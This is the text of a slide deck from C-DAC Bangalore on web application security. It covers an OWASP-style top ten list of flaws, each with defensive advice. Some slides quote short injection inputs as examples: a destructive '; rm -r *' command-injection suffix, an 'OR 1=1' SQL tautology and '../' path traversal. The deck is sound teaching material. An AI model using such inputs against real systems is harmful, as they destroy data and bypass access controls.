Upload
gopikrishnan-radhakrishnan
View
217
Download
0
Embed Size (px)
Citation preview
7/27/2019 web_app_sec
1/44
C-DAC, EC, Bangalore
Web Application
Security
Centre for Development of Advanced Computing (C-DAC)Electronics City, Bangalore.
7/27/2019 web_app_sec
2/44
C-DAC, EC, Bangalore
Agenda Who are your Enemies
What is a web application
SD3 Security Framework
Top 10 vulnerabilities
How to avoid these
Demo Example
7/27/2019 web_app_sec
3/44
C-DAC, EC, Bangalore
Know Your Enemy
If you know both the, enemy and
yourself, you will fight a hundred battles
without danger of defeat;
If you are ignorant of the enemy but
only know yourself, your chances of
winning and losing are equal;
If you know neither the enemy nor
yourself, you will certainly be defeated in
every battle.SUN TZU ON THE ART OF WAR
THE OLDEST MILITARY TREATISE IN THE WORLD
Chinese general, 500 B.C.
7/27/2019 web_app_sec
4/44
C-DAC, EC, Bangalore
Who are the enemies?
Innocent (?) Users.. Can be u (!)..
Hackers..()
7/27/2019 web_app_sec
5/44
C-DAC, EC, Bangalore
What is a web application?
7/27/2019 web_app_sec
6/44
C-DAC, EC, Bangalore
Web application A web application or web service is a
software application that is accessible using a
web browser or HTTP(s) user agent.
A web application or webapp is an
application that is accessed via web browser
over a network such as the Internet or anintranet.
A computer software application that is
7/27/2019 web_app_sec
7/44
7/27/2019 web_app_sec
8/44
C-DAC, EC, Bangalore
Web application securitySimply, Web Application Security
is...
Securing of web applications.
Security goes beyond establishing a firewalland implementing SSL.
Includes IDS, Policy, Standards, Awareness,Audit, Testing.
Do not assume someone else is taking care ofit.
7/27/2019 web_app_sec
9/44 C-DAC, EC, Bangalore
Is your application really
secure
7/27/2019 web_app_sec
10/44 C-DAC, EC, Bangalore
Firewalls
Firewalls can provide:
Secure gateway to the Internet for internal
clients
Packet filtering
Auditing
Firewalls cannot provide:
Protection against application
level attacks over HTTP or HTTPS
7/27/2019 web_app_sec
11/44 C-DAC, EC, Bangalore
Through the firewall
without afire suit
7/27/2019 web_app_sec
12/44 C-DAC, EC, Bangalore
Concepts
Threat : Any natural or unintentional event
with the potential to cause harm to an
information system, resulting in a degradation
of a systems ability to fully perform its
mission.
Vulnerability: A security exposure in a system
software or application software component.
7/27/2019 web_app_sec
13/44 C-DAC, EC, Bangalore
The SD3 Security Framework
SecureSecureby Designby Design
SecureSecureby Defaultby Default
Secure inSecure inDeploymentDeployment
Secure architecture and codeSecure architecture and code
Threat analysisThreat analysis
Vulnerability reductionVulnerability reduction
Attack surface area reducedAttack surface area reduced
Unused features turned off by defaultUnused features turned off by default
Minimum privileges usedMinimum privileges used
Protection: Detection, defense,Protection: Detection, defense,recovery, managementrecovery, management
Process: How to guides, architectureProcess: How to guides, architectureguidesguides
People: TrainingPeople: Training
7/27/2019 web_app_sec
14/44 C-DAC, EC, Bangalore
Adopt the SD3 Security Framework
Build threat modelsBuild threat modelsConduct code reviews, penetration testsConduct code reviews, penetration tests
Run code with minimal privilegesRun code with minimal privileges
Minimize your attack surfaceMinimize your attack surface
Enable services securelyEnable services securely
Leverage the security best practicesLeverage the security best practices
Create security guidanceCreate security guidance
Build tools to assess application securityBuild tools to assess application security
SecureSecureby Designby Design
SecureSecureby Defaultby Default
Secure inSecure inDeploymentDeployment
7/27/2019 web_app_sec
15/44 C-DAC, EC, Bangalore
Your code is part of your security
perimeter
Firewall
Hardened OS
Web Server
App Server
Firewall
Databases
LegacySystems
WebServices
Directories
H
umanResrcs
Billing
Custom Developed
Application CodeAPPLICATION
ATTACK
You cant use network layer protection (firewall, SSL, IDS, hardening)to stop or detect application layer attacks
NetworkLayer
Ap
plicationLayer
Your security perimeter has hugeholes at the application layer
7/27/2019 web_app_sec
16/44
7/27/2019 web_app_sec
17/44 C-DAC, EC, Bangalore
Top 10 Vulnerabilities
Invalidated Parameters Broken Access Control
Broken Account and Session Management
Cross-site Scripting(XSS) Flaws Buffer Overflows
Command Injection Flaws
Error Handling Problems
Insecure Use of Cryptography
Remote Administration Flaws
Web and Application Server
Misconfiguration
7/27/2019 web_app_sec
18/44 C-DAC, EC, Bangalore
95% of Web Apps Have Vulnerabilities
Cross-site scripting (80 percent)
SQL injection (62 percent)
Parameter tampering (60 percent)
Cookie poisoning (37 percent) Database server (33 percent)
Web server (23 percent)
Buffer overflow (19 percent)
7/27/2019 web_app_sec
19/44 C-DAC, EC, Bangalore
1. Invalidated Parameters
Attacker can easily tamper any part of the HTTPrequest
before submitting.
- URL
- Cookies- Form fields
- Hidden fields
- Headers
Common names for common input tampering attacksforced browsing, command insertion, cross sitescripting, buffer overflows, format string attacks,SQL injection, cookie poisoning, and hidden fieldmanipulation.
7/27/2019 web_app_sec
20/44 C-DAC, EC, Bangalore
Invalidated Parameters continued..
Do rigorous input data validation
- All parameters should be validated beforeuse
Do server-side validation
- Client side validation could be bypassed bythe attacker easily
- Client side validation is to be used mainly forquick user responsiveness
7/27/2019 web_app_sec
21/44 C-DAC, EC, Bangalore
Invalidated Parameters
continued.. Use centralized code for input validation
- Scattered code is hard to maintain
Each parameter should be checked against astrict format that specifies exactly what inputwill be allowed.
7/27/2019 web_app_sec
22/44 C-DAC, EC, Bangalore
2. Broken Access Control
Access control is how you keep one user awayfrom other users information
The problem is that many environments
provide authentication, but dont handle accesscontrol well
Many sites have a complex access controlpolicy
Key Points
Write down your access control policy
Dont use any ids that an attacker can
7/27/2019 web_app_sec
23/44 C-DAC, EC, Bangalore
Broken Access Control continued..
7/27/2019 web_app_sec
24/44 C-DAC, EC, Bangalore
3. Broken Account and Session Management Includes all aspects of handling user
authentication and managing active sessions. Session hi-jacking
If the session cookies are not properly
protected, an attacker can hijack an activesession and assume the identity of a user.
Account Management
Handling credentials across client-server
gap Backend authentication credentials too
7/27/2019 web_app_sec
25/44 C-DAC, EC, Bangalore
Broken Account and
Session Management ...
Session Management HTTP is a stateless protocol. Web apps
need to keep track of which request camefrom which user
Brand sessions with an id using cookie,hidden field, URL tag, etc
Key Points
Keep credentials secret at all times
Use only the random sessionid provided byyour environment
7/27/2019 web_app_sec
26/44 C-DAC, EC, Bangalore
4. Cross-site Scripting (XSS)An attacker can use cross site scripting
technique to implement malicious script (into aserver), which is then sent to unsuspecting usersaccessing the same server.
Example: Chat server
The attacked users (victim's) browser has no
way to know that the script should not betrusted, and will execute the script.
Because it thinks the script came from a trustedsource, the
7/27/2019 web_app_sec
27/44 C-DAC, EC, Bangalore
4. Cross-site Scripting (XSS)
What it does ?
Disclose users session cookie session high-jacking
Disclose end user files
Redirect user to some other page or site Modify presentation of content
How to avoid ?
Search for all places where input from an HTTPrequest could possibly make its way into the HTMLoutput
7/27/2019 web_app_sec
28/44
C-DAC, EC, Bangalore
XSS Scenario continued.. The server is a chat server
The chat server displays whatever messagethat is
typed in by a particular user to all otherusers.
An attacker (user A) implements JavaScript aspart
of a message (message A). The chat server saves the message (into the
database or whatever storage) without inputvalidation.
When unsus ectin user user B reads the
7/27/2019 web_app_sec
29/44
C-DAC, EC, Bangalore
5 .Buffer Overflow Many system put limits on how much data a
variable can store or a system can handle.
Often times if these limits are exceeded, the
data will still be used, but bypass certainsecurity considerations.
Attackers use buffer overflows to corrupt theexecution stack of a web application.
By sending carefully crafted input to a webapplication, an attacker can cause the webapplication to execute arbitrary code.
7/27/2019 web_app_sec
30/44
C-DAC, EC, Bangalore
Buffer Overflow continued.. Buffer overflow flaws can be present in both
the web server or application server productsor the web application itself.
URLs such as: http://www.myweb.com/cgi?param=filenam
e
Replaced with:
http://www.myweb.com/cgi?param=
7/27/2019 web_app_sec
31/44
C-DAC, EC, Bangalore
6. SQL Injection When a web application passes information
from an HTTP request through as part of anexternal request, the attacker can inject special(meta) characters, malicious commands, orcommand modifiers into the information.
SQL injection is a particularly widespread anddangerous form of injection
- To exploit a SQL injection flaw, the attackermust find a
parameter that the web application passesthrough to a
database.
7/27/2019 web_app_sec
32/44
C-DAC, EC, Bangalore
SQL Injection continued.. Path traversal
- ../ characters as part of a filename request
Additional commands could be tacked on to the end
of a parameter that is passed to a shell script toexecute an additional shell command
-; rm r *
SQL queries could be modified by adding additional
constraints to a where clause-OR 1=1
7/27/2019 web_app_sec
33/44
C-DAC, EC, Bangalore
7 . Improper Error Handling
The most common problem is when detailedinternal error messages such as stack traces,database dumps, and error codes are displayed
to a potential hacker These messages reveal implementation details
that should never be revealed
Inconsistent errors may reveal internal info.
- File not found vs. Access denied
7/27/2019 web_app_sec
34/44
C-DAC, EC, Bangalore
Improper Error Handling continued..
The errors must be handled according to a wellthought out scheme that will
- provide a meaningful error message to the
user- provide diagnostic information to the site
maintainers
- provide no useful information to anattacker
All security mechanisms should deny access
until specifically granted, not grant access
7/27/2019 web_app_sec
35/44
C-DAC, EC, Bangalore
Improper Error Handling continued..
A specific policy for how to handle errorsshould be documented, including
- The types of errors to be handled
- For each, what information is going to bereported back to the user
What information is going to be logged
In the implementation, ensure that the site is
built togracefully handle all possible errors.
When errors occur, the site should respond with
a
7/27/2019 web_app_sec
36/44
C-DAC, EC, Bangalore
8. Insecure Use of Cryptography
Use cryptography to store sensitive information
Algorithms are simple to use, integrating them ishard
Key Points
Do not even think about inventing a new algorithm
Be extremely careful storing keys, certs, and
passwords Rethink whether you need to store the information
Dont store user passwords use a hash like SHA-256
7/27/2019 web_app_sec
37/44
C-DAC, EC, Bangalore
9. Remote Administration Flaws
Many sites allow remote administration
- Very powerful, often hidden interfaces
- Difficult to protect
Key Points- Eliminate all administration over the Internet
- Separate the admin application from the main app
- Limit the scope of remote administration
Consider strong authentication- Smart card or token
7/27/2019 web_app_sec
38/44
C-DAC, EC, Bangalore
10. Web and Application Server
Misconfiguration All web and application servers have many security-
relevant configuration options
Default accounts and passwords
Unnecessary default, backup, sample apps,libraries
Overly informative error messages
Misconfigured SSL, default certificates, self-
signed certs Unused administrative services
Key Points:
Keep up with patches (Code Red, Slammer)
Use Scanning Tools (Nikto, Nessus)
7/27/2019 web_app_sec
39/44
C-DAC, EC, Bangalore
Secure your application Training
Read the Top Ten paper!
Get developers trained in web application security
Try OWASP WebGoat to learn how flaws work
Policy
Write down the security rules for your application
Reviews
Get expert code review and penetration test
periodically
K t
7/27/2019 web_app_sec
40/44
C-DAC, EC, Bangalore
Keys to secure your
application Customers Demand web applications that dont have these ten
simple problems
Developers
Take responsibility for securing your code
Software Development Organizations
Guarantee that your web applications dont havethe top ten flaws
Educators
Stop teaching insecure coding
Project Managers
Split your security budget between network and
7/27/2019 web_app_sec
41/44
C-DAC, EC, Bangalore
Tools WebScarab - a web application vulnerability
assessment suite including proxy tools
Validation Filters (Stinger for J2EE, filtersfor PHP) generic security boundary filters thatdevelopers can use in their own applications
CodeSpy look for security issues usingreflection in J2EE apps
7/27/2019 web_app_sec
42/44
C-DAC, EC, Bangalore
WebGoat - an interactive training and
benchmarking tool that users can learn about
web application security in a safe and legal
environment
WebSphinx web crawler looking for security
issues in web applications
OWASP - Java based portal code designed withsecurity as a prime concern
7/27/2019 web_app_sec
43/44
C-DAC, EC, Bangalore
Case Study
7/27/2019 web_app_sec
44/44
Thank You !!